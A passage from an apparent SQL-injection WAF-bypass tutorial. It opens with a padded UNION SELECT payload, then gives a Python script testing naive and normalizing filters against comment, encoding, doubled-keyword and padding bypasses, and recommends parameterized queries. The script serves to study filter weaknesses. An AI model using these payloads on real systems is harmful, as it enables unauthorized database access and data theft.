AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6-- x
    The query only looks big because the A is repeated 1000 times; that padding is what gets it past common filters.
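The script below is an added example, not code from this page or from any real WAF. It models the two kinds of filter described in the bypass list above (a blocklist that answers 403, and a preg_replace-style sanitizer) against the versioned-comment, doubled-keyword, double-encoding and #-newline tricks, plus the padded value from the 500 server error section, and then shows what a normalizing filter, which decodes to a fixed point and resolves MySQL's comment forms before matching, does with the same inputs. The payload strings are constructed for this example; the regexes and the 512-byte inspection limit are assumptions, not any product's rules.

```python
import re
from urllib.parse import unquote

# Constructed sample values for the id parameter, URL-decoded the way the page
# shows them (the '+' in the page's URLs stands for a space). Each mirrors one
# trick from the list above.
PAYLOADS = {
    "plain":        "1 and 1=0 union all select 1,2,3,4,5--",
    "versioned":    "1/*!UnIoN*/SeLeCT 1,2,3--",                   # /*! */ + mixed case
    "doubled":      "1 UNIunionON SELselectECT 1,2,3--",           # keyword inside keyword
    "double_enc":   "1%252f%252a*/UNION%252f%252a*/SELECT 1,2,3--",  # %25 is '%'
    "hash_newline": "1 %23x%0aUnIOn%23x%0aSeLecT 1,2,3--",        # '#' comment + newline
}
# The '500 server error' shape: 1000 bytes of padding before the keywords.
OVERSIZED = ("-1 and (select 1)=(select 0x" + "A" * 1000
             + ") /*!UNION*/ /*!SELECT*//**/1,2,3,4,5,6-- x")

UNION_SELECT = re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)
KEYWORDS = re.compile(r"union|select", re.I)


def naive_waf_blocks(value):
    """Blocklist of the kind that answers 403: decode once, then look for the
    literal phrase 'union select' (assumed rule, not a real product's)."""
    return UNION_SELECT.search(unquote(value)) is not None


def naive_sanitize(value):
    """The preg_replace('/union|select/i', '', $id) scenario: a single pass."""
    return KEYWORDS.sub("", value)


def sanitize_fixpoint(value):
    """Same stripping, repeated until nothing changes, so keywords that the
    first pass re-assembles (UNIunionON -> UNION) do not survive."""
    while True:
        stripped = KEYWORDS.sub("", value)
        if stripped == value:
            return value
        value = stripped


def normalize(value):
    """Bring the value into the form MySQL's parser will see before matching:
    percent-decode to a fixed point, keep the body of /*! */ (MySQL executes
    it), turn ordinary /* */, # and -- comments into whitespace, fold case."""
    for _ in range(5):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = re.sub(r"/\*!\d{0,5}(.*?)\*/", r" \1 ", value, flags=re.S)
    value = re.sub(r"/\*.*?\*/", " ", value, flags=re.S)
    value = re.sub(r"(?:#|--\s).*?(?:\n|$)", " ", value)
    return re.sub(r"\s+", " ", value).strip().lower()


def normalized_blocks(value):
    return UNION_SELECT.search(normalize(value)) is not None


def bounded_waf_blocks(value, limit=512):
    """A filter that only inspects the first `limit` bytes of a parameter
    (assumed limit); this is what the padded payload gets past."""
    return normalized_blocks(value[:limit])


def evaluate():
    """name -> (naive blocklist blocks it?, normalizing filter blocks it?)"""
    return {name: (naive_waf_blocks(v), normalized_blocks(v))
            for name, v in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive, normalized) in evaluate().items():
        print(f"{name:13} naive={naive!s:5} normalized={normalized}")
    print("doubled after one preg_replace pass :", naive_sanitize(PAYLOADS["doubled"]))
    print("doubled after fixed-point stripping :", sanitize_fixpoint(PAYLOADS["doubled"]))
    print("oversized: bounded=%s full=%s"
          % (bounded_waf_blocks(OVERSIZED), normalized_blocks(OVERSIZED)))
```

Running it shows that only the plain query trips the naive blocklist, while the normalizer catches the versioned-comment, double-encoded and #-newline variants because they all reduce to the same "1 union select" once decoded and de-commented. The doubled keyword is a different problem: no detector sees "union select" in UNIunionON, which is why a sanitizer must strip to a fixed point (or, better, not be the control at all). The padded value gets past a filter that inspects only a prefix but not one that reads the whole parameter. None of this replaces parameterized queries in the application; a WAF only raises the attacker's cost.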
